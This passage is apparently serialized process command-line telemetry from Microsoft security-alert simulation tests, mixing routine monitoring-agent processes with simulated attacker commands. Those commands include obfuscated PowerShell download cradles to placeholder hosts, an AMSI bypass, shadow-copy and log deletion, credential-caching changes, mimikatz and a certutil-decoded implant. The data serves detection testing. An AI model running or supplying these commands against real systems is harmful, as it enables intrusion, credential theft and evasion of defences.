State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd  /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32  /C 42424.exe\",\"42424.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32  /C 1234.exe\",\"1234.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32  /C reg.exe\",\"reg.exe\",\".\\\\reg.exe  add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe  C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe  /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe  \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\ProgramData\\\"&copy \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin  delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net  user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator Bob_testing /add\",\"net  share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"net  use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"net  use q: /delete\",\"net  share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare /delete\",\"net  user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator /delete\",\".\\\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe   -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe  -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd   /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil  -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe  k111\",\"implant.exe  81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe  -b -t -m\",\"cmd  /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net  localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1  localgroup Administrators\",\"whoami\",\"hostname\",\"netstat  -an\",\"net  user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user Bob1 /domain\",\"net  user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user BobX /domain\",\"net  group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1  group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32  /C ShEll32Control_RanDLL.dll\",\".\\\\reg  query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg  add Image File Execution Options sethc.exe\",\".\\\\ftp  -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg  add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg  add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net  use v: \\\\\\\\tsclient\\\\c\",\"net  v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1  v: /delete\",\"cmd  /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh  advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg  add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe  /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe  -k malicious\",\"cmd.exe  /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe  -foo\",\".\\\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe  /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\".\\\\lsass.exe  /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd  /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe  c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd  /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe   firewall set opmode mode=disable profile=all\",\"cmd  /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe   @ abc.com abc.wallet\",\"cmd  /c echo /e:vbscript.encode /b\",\"pcalua.exe  -a \\\\\\\\server\\\\payload.dll\",\"findstr  /si password sysvol *.txt\",\"odbcconf.exe  /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe  /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe  464 0 0x0110:40\",\"mt.exe  port\",\"mt.exe  smb\",\"hd.exe  -pslist\",\"hd.exe  -enum\",\"netsh.exe  PortOpenning\",\"certutil  -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg  add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg  delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc  create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc  delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd  /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe   add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe  /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32  /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe 